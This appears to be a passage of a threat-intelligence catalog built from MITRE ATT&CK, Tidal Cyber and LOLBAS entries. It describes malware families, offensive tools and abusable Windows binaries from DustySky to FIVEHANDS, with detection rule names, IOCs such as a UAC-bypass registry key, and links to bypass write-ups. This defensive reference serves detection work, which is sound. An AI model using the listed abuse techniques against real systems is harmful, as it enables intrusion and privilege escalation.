UUID 77506f02-104f-4aac-a4e0-9649bd7efe2e which can be used as unique global reference for DustySky in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0062
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']

Dxcap

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: DirectX diagnostics/debugger included with Visual Studio.

Author: Oddvar Moe

Paths:
* C:\Windows\System32\dxcap.exe
* C:\Windows\SysWOW64\dxcap.exe

Resources: * https://twitter.com/harr0ey/status/992008180904419328

Detection: * Sigma: proc_creation_win_lolbin_susp_dxcap.yml[Dxcap.exe - LOLBAS Project]

Internal MISP references

UUID 9b5039b9-c5f1-4516-88ef-f63966ec2b36 which can be used as unique global reference for Dxcap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5220
source Tidal Cyber
tags ['6d065f28-e32d-4e87-b315-c43ebc45532a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Dyre

Dyre is a banking Trojan that has been used for financial gain. [Symantec Dyre June 2015][Malwarebytes Dyreza November 2015]

Internal MISP references

UUID 38e012f7-fb3a-4250-a129-92da3a488724 which can be used as unique global reference for Dyre in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0024
source MITRE
type ['malware']

Earthworm

Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".[Elastic Docs Potential Protocol Tunneling via EarthWorm] According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.[U.S. CISA Volt Typhoon May 24 2023]

Internal MISP references

UUID ee14e483-b5ef-4931-9c2a-72046b6555cc which can be used as unique global reference for Earthworm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5013
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Ebury

Ebury is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).[ESET Ebury Feb 2014][BleepingComputer Ebury March 2017][ESET Ebury Oct 2017]

Internal MISP references

UUID 2375465a-e6a9-40ab-b631-a5b04cf5c689 which can be used as unique global reference for Ebury in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0377
source MITRE
type ['malware']

ECCENTRICBANDWAGON

ECCENTRICBANDWAGON is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool, with keylogging and screen capture functionality, used for information gathering on compromised systems.[CISA EB Aug 2020]

Internal MISP references

UUID 70f703b3-0e24-4ffe-9772-f0e386ec607f which can be used as unique global reference for ECCENTRICBANDWAGON in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0593
source MITRE
type ['malware']

Ecipekac

Ecipekac is a multi-layer loader that has been used by menuPass since at least 2019 including use as a loader for P8RAT, SodaMaster, and FYAnti.[Securelist APT10 March 2021]

Internal MISP references

UUID 6508d3dc-eb22-468c-9122-dcf541caa69c which can be used as unique global reference for Ecipekac in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0624
source MITRE
type ['malware']

Egregor

Egregor is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between Egregor and Sekhmet ransomware, as well as Maze ransomware.[NHS Digital Egregor Nov 2020][Cyble Egregor Oct 2020][Security Boulevard Egregor Oct 2020]

Internal MISP references

UUID 0e36b62f-a6e2-4406-b3d9-e05204e14a66 which can be used as unique global reference for Egregor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0554
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '0ed7d10c-c65b-4174-9edb-446bf301d250', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

EKANS

EKANS is a ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, in some cases resulting in significant operational disruptions. EKANS has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb), similar to those defined in MegaCortex.[Dragos EKANS][Palo Alto Unit 42 EKANS]

Internal MISP references

UUID cd7821cb-32f3-4d81-a5d1-0cdee94a15c4 which can be used as unique global reference for EKANS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0605
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Elise

Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. [Lotus Blossom Jun 2015][Accenture Dragonfish Jan 2018]

Internal MISP references

UUID fd5efee9-8710-4536-861f-c88d882f4d24 which can be used as unique global reference for Elise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0081
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

ELMER

ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16. [FireEye EPS Awakens Part 2]

Internal MISP references

UUID 6a3ca97e-6dd6-44e5-a5f0-7225099ab474 which can be used as unique global reference for ELMER in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0064
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Emissary

Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio. [Lotus Blossom Dec 2015]

Internal MISP references

UUID fd95d38d-83f9-4b31-8292-ba2b04275b36 which can be used as unique global reference for Emissary in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0082
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Emotet

Emotet is a modular malware variant that is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [Trend Micro Banking Malware Jan 2019]

Internal MISP references

UUID c987d255-a351-4736-913f-91e2f28d0654 which can be used as unique global reference for Emotet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0367
source MITRE
tags ['71dfe8d1-666f-4e71-8761-d2876078fb3e', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Empire

Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[NCSC Joint Report Public Tools][Github PowerShell Empire][GitHub ATTACK Empire]

Internal MISP references

UUID fea655ac-558f-4dd0-867f-9a5553626207 which can be used as unique global reference for Empire in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0363
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4f05a12d-f497-4081-acb9-9a257ab87886', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']
Related clusters

To see the related clusters, click here.

EnvyScout

EnvyScout is a dropper that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]

Internal MISP references

UUID 8da6fbf0-a18d-49a0-9235-101300d49d5e which can be used as unique global reference for EnvyScout in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0634
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Epic

Epic is a backdoor that has been used by Turla. [Kaspersky Turla]

Internal MISP references

UUID a7e71387-b276-413c-a0de-4cf07e39b158 which can be used as unique global reference for Epic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0091
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

esentutl

esentutl is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[Microsoft Esentutl]

Internal MISP references

UUID a7589733-6b04-4215-a4e7-4b62cd4610fa which can be used as unique global reference for esentutl in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0404
source MITRE
tags ['ee88899a-2bf0-4b96-bf69-5b686fa463c3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Eventvwr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Displays Windows Event Logs in a GUI window.

Author: Jacob Gajek

Paths:
* C:\Windows\System32\eventvwr.exe
* C:\Windows\SysWOW64\eventvwr.exe

Resources:
* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
* https://twitter.com/orange_8361/status/1518970259868626944

Detection:
* Sigma: proc_creation_win_uac_bypass_eventvwr.yml
* Sigma: registry_set_uac_bypass_eventvwr.yml
* Sigma: file_event_win_uac_bypass_eventvwr.yml
* Elastic: privilege_escalation_uac_bypass_event_viewer.toml
* Splunk: eventvwr_uac_bypass.yml
* IOC: eventvwr.exe launching a child process other than mmc.exe
* IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command [Eventvwr.exe - LOLBAS Project]

Internal MISP references

UUID 4c371bd9-c97c-42ab-b913-1e19cd409382 which can be used as unique global reference for Eventvwr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5105
source Tidal Cyber
tags ['59d03fb8-0620-468a-951c-069473cb86bc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

EvilBunny

EvilBunny is a C++ malware sample observed since 2011 that was designed to be an execution platform for Lua scripts.[Cyphort EvilBunny Dec 2014]

Internal MISP references

UUID 300e8176-e7ee-44ef-8d10-dff96502f6c6 which can be used as unique global reference for EvilBunny in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0396
source MITRE
type ['malware']

EvilGinx

EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".[GitHub evilginx2]

Internal MISP references

UUID 4892c22d-6fd4-4876-8e8a-af968cf61ecc which can be used as unique global reference for EvilGinx in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5078
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['malware']
Related clusters

To see the related clusters, click here.

EvilGrab

EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns. [PWC Cloud Hopper Technical Annex April 2017]

Internal MISP references

UUID e862419c-d6b6-4433-a02a-c1cc98ea6f9e which can be used as unique global reference for EvilGrab in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0152
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

EVILNUM

EVILNUM is a fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group of the same name, Evilnum.[ESET EvilNum July 2020][Prevailion EvilNum May 2020]

Internal MISP references

UUID e0eaae6d-5137-4053-bf37-ff90bf5767a9 which can be used as unique global reference for EVILNUM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0568
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Exaramel for Linux

Exaramel for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under Exaramel for Windows.[ESET TeleBots Oct 2018]

Internal MISP references

UUID c773f709-b5fe-4514-9d88-24ceb0dd8063 which can be used as unique global reference for Exaramel for Linux in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0401
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Exaramel for Windows

Exaramel for Windows is a backdoor used for targeting Windows systems. The Linux version is tracked separately under Exaramel for Linux.[ESET TeleBots Oct 2018]

Internal MISP references

UUID 21569dfb-c9f1-468e-903e-348f19dbae1f which can be used as unique global reference for Exaramel for Windows in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0343
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Excel

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
* C:\Program Files\Microsoft Office\Office16\Excel.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
* C:\Program Files\Microsoft Office\Office15\Excel.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
* C:\Program Files\Microsoft Office\Office14\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
* C:\Program Files\Microsoft Office\Office12\Excel.exe

Resources:
* https://twitter.com/reegun21/status/1150032506504151040
* https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

Detection:
* Sigma: proc_creation_win_lolbin_office.yml
* IOC: Suspicious Office application Internet/network traffic [Excel.exe - LOLBAS Project]

Internal MISP references

UUID 46efd94e-afd2-4536-8525-0619fc56966f which can be used as unique global reference for Excel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5221
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ExMatter

ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.[Symantec Noberus September 22 2022]

Internal MISP references

UUID 068b26ae-39b5-4b4e-8faa-eb304a17687d which can be used as unique global reference for ExMatter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5054
source Tidal Cyber
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

Expand

Expand is a Windows utility used to expand one or more compressed CAB files.[Microsoft Expand Utility] It has been used by BBSRAT to decompress a CAB file into executable content.[Palo Alto Networks BBSRAT]

Internal MISP references

UUID 5d7a39e3-c667-45b3-987e-3b0ca49cff61 which can be used as unique global reference for Expand in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0361
source MITRE
tags ['182dd4be-bbda-404f-aad1-156a22bbe7a4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Explorer

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary used for managing files and system components within Windows

Author: Jai Minton

Paths:
* C:\Windows\explorer.exe
* C:\Windows\SysWOW64\explorer.exe

Resources:
* https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
* https://twitter.com/bohops/status/1276356245541335048
* https://twitter.com/bohops/status/986984122563391488

Detection:
* Sigma: proc_creation_win_explorer_break_process_tree.yml
* Sigma: proc_creation_win_explorer_lolbin_execution.yml
* Elastic: initial_access_via_explorer_suspicious_child_parent_args.toml
* IOC: Multiple instances of explorer.exe, or explorer.exe using the /root command line, is suspicious. [Explorer.exe - LOLBAS Project]

Internal MISP references

UUID b792d713-fbb4-46e6-94ae-8b9a1f4e794d which can be used as unique global reference for Explorer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5106
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Explosive

Explosive is a custom-made remote access tool used by the group Volatile Cedar. It was first identified in the wild in 2015.[CheckPoint Volatile Cedar March 2015][ClearSky Lebanese Cedar Jan 2021]

Internal MISP references

UUID 572eec55-2855-49ac-a82e-2c21e9aca27e which can be used as unique global reference for Explosive in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0569
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Extexport

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Load a DLL located in the c:\test folder with a specific name.

Author: Oddvar Moe

Paths:
* C:\Program Files\Internet Explorer\Extexport.exe
* C:\Program Files (x86)\Internet Explorer\Extexport.exe

Resources:
* http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/

Detection:
* Sigma: proc_creation_win_lolbin_extexport.yml
* IOC: Extexport.exe loads a DLL and is executed from a folder other than its original path [Extexport.exe - LOLBAS Project]

Internal MISP references

UUID 2e6f1aed-a983-44fb-aed1-b4a3d9cb9488 which can be used as unique global reference for Extexport in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5107
source Tidal Cyber
tags ['5b81675a-742a-4ffd-b410-44ce3f1b0831', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ExtPassword

ExtPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 363c38fc-8676-4a63-b3f4-f0237565a951 which can be used as unique global reference for ExtPassword in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5030
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Extrac32

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Extract to ADS, copy or overwrite a file with Extrac32.exe

Author: Oddvar Moe

Paths:
* C:\Windows\System32\extrac32.exe
* C:\Windows\SysWOW64\extrac32.exe

Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://twitter.com/egre55/status/985994639202283520

Detection:
* Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
* Sigma: proc_creation_win_lolbin_extrac32.yml
* Sigma: proc_creation_win_lolbin_extrac32_ads.yml [Extrac32.exe - LOLBAS Project]

Internal MISP references

UUID 53dc0180-0309-4489-af75-9c76b2887359 which can be used as unique global reference for Extrac32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5108
source Tidal Cyber
tags ['92092803-19a9-4288-b7fb-08e92e8ea693', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

FakeM

FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]

Internal MISP references

UUID 8c64a330-1457-4c32-ab2f-12b6eb37d607 which can be used as unique global reference for FakeM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0076
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

FALLCHILL

FALLCHILL is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website. [US-CERT FALLCHILL Nov 2017]

Internal MISP references

UUID ea47f1fd-0171-4254-8c92-92b7a5eec5e1 which can be used as unique global reference for FALLCHILL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0181
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

FatDuke

FatDuke is a backdoor used by APT29 since at least 2016.[ESET Dukes October 2019]

Internal MISP references

UUID 997ff740-1b00-40b6-887a-ef4101e93295 which can be used as unique global reference for FatDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0512
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

Felismus

Felismus is a modular backdoor that has been used by Sowbug. [Symantec Sowbug Nov 2017] [Forcepoint Felismus Mar 2017]

Internal MISP references

UUID c66ed8ab-4692-4948-820e-5ce87cc78db5 which can be used as unique global reference for Felismus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0171
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

FELIXROOT

FELIXROOT is a backdoor that has been used to target Ukrainian victims. [FireEye FELIXROOT July 2018]

Internal MISP references

UUID 4b1a07cd-4c1f-4d93-a454-07fd59b3039a which can be used as unique global reference for FELIXROOT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0267
source MITRE
type ['malware']

Ferocious

Ferocious is a first stage implant composed of VBS and PowerShell scripts that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]

Internal MISP references

UUID 3e54ba7a-fd4c-477f-9c2d-34b4f69fc091 which can be used as unique global reference for Ferocious in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0679
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Fgdump

Fgdump is a Windows password hash dumper. [Mandiant APT1]

Internal MISP references

UUID 1bbf04bb-d869-48c5-a538-70a25503de1d which can be used as unique global reference for Fgdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0120
source MITRE
type ['tool']

FileZilla

FileZilla is a cross-platform tool used to transfer files to a site, server, or host over the File Transfer Protocol (FTP).[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID f2a6f899-15a8-4d77-bebd-14bc03958764 which can be used as unique global reference for FileZilla in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5031
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Final1stspy

Final1stspy is a dropper family that has been used to deliver DOGCALL.[Unit 42 Nokki Oct 2018]

Internal MISP references

UUID eb4dc358-e353-47fc-8207-b7cb10d580f7 which can be used as unique global reference for Final1stspy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0355
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Findstr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Write to ADS, discover, or download files with Findstr.exe

Author: Oddvar Moe

Paths:
* C:\Windows\System32\findstr.exe
* C:\Windows\SysWOW64\findstr.exe

Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Detection:
* Sigma: proc_creation_win_lolbin_findstr.yml [Findstr.exe - LOLBAS Project]

Internal MISP references

UUID a62634f8-8f42-4874-9669-bea2e053dfea which can be used as unique global reference for Findstr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5109
source Tidal Cyber
tags ['6ca537bb-94b6-4b12-8978-6250baa6a5cb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

FinFisher

FinFisher is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including Wingbird. [FinFisher Citation] [Microsoft SIR Vol 21] [FireEye FinSpy Sept 2017] [Securelist BlackOasis Oct 2017] [Microsoft FinFisher March 2018]

Internal MISP references

UUID 41f54ce1-842c-428a-977f-518a5b63b4d7 which can be used as unique global reference for FinFisher in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Android', 'Windows']
software_attack_id S0182
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Finger

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon

Author: Ruben Revuelta

Paths:
* c:\windows\system32\finger.exe
* c:\windows\syswow64\finger.exe

Resources:
* https://twitter.com/DissectMalware/status/997340270273409024
* https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)

Detection:
* Sigma: proc_creation_win_finger_usage.yml
* IOC: finger.exe should not be run on a normal workstation.
* IOC: finger.exe connecting to external resources. [Finger.exe - LOLBAS Project]

Internal MISP references

UUID a9ce311d-dd8c-497d-b38f-b535d7318ed4 which can be used as unique global reference for Finger in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5110
source Tidal Cyber
tags ['1da4f610-4c54-46a3-b9b3-c38a002b623e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

FIVEHANDS

FIVEHANDS is a customized version of DEATHRANSOM ransomware written in C++. FIVEHANDS has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.[FireEye FiveHands April 2021][NCC Group Fivehands June 2021]

Internal MISP references

UUID 84187393-2fe9-4136-8720-a6893734ee8c which can be used as unique global reference for FIVEHANDS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0618
source MITRE
